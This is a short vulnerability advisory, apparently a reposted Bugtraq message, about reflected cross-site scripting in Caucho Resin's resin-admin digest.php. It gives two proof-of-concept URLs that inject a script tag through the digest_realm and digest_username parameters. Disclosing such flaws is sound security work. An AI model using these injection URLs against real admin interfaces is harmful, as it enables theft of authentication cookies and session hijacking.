New User, Welcome!     Login

Caucho Technology Resin digest.php Cross Site Scripting Vulnerability

Related Terms:
malicious user
From: xuanmumu gmail com
To: bugtraq securityfocus com
Cc:
Subject: Caucho Technology Resin digest.php Cross Site Scripting Vulnerability
Date: Tue - May 18, 2010 04:12 PM 


This vulnerability do not need to login.digest.php use the REQUEST method in a wrong way to accept parameters,the malicious user could submit xss code on this page and an attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

exp:

http://test.com/resin-admin/digest.php?digest_attempt=1&digest_realm="><script>alert("ZnVjayBjbnZk")</script><a&digest_username[]=
http://test.com/resin-admin/digest.php?digest_attempt=1&digest_username="><script>alert("ZnVjayBjbnZk")</script><a

Test on Resin Professional 3.1.5


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!